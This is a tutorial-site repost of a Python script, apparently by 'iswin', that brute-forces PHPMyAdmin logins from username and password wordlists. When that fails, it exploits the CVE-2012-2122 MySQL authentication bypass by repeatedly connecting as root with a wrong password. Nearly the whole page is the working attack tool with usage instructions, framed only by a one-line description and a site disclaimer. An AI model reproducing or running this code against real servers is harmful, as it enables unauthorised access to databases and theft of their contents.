Home >Backend Development >Python Tutorial >Python写的PHPMyAdmin暴力破解工具代码
Python写的PHPMyAdmin暴力破解工具代码
- WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOriginal
- 2016-06-16 08:43:002097browse
PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。
#!/usr/bin/env python
import urllib
import urllib2
import cookielib
import sys
import subprocess
def Crack(url,username,password):
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar()))
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
params = urllib.urlencode({'pma_username': username, 'pma_password': password})
request = urllib2.Request(url+"/index.php", params,headers)
response = opener.open(request)
a=response.read()
if a.find('Database server')!=-1 and a.find('name="login_form"')==-1:
return username,password
return 0
def MySQLAuthenticationBypassCheck(host,port):
i=0
while i<300:
i=i+1
subprocess.Popen("mysql --host=%s -P %s -uroot -piswin" % (host,port),shell=True).wait()
if __name__ == '__main__':
if len(sys.argv)<4:
print "#author:iswin\n#useage python pma.py http://www.jb51.net/phpmyadmin/ username.txt password.txt"
sys.exit()
print "Bruting,Pleas wait..."
for name in open(sys.argv[2],"r"):
for passw in open(sys.argv[3],"r"):
state=Crack(sys.argv[1],name,passw)
if state!=0:
print "\nBrute successful"
print "UserName: "+state[0]+"PassWord: "+state[1]
sys.exit()
print "Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck"
choice=raw_input('Warning:This function needs mysql environment.\nY:Try to MySQLAuthenticationBypassCheck\nOthers:Exit\n')
if choice=='Y' or choice=='y':
host=raw_input('Host:')
port=raw_input('Port:')
MySQLAuthenticationBypassCheck(host,port)
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Previous article:用python删除java文件头上版权信息的方法Next article:python编写网页爬虫脚本并实现APScheduler调度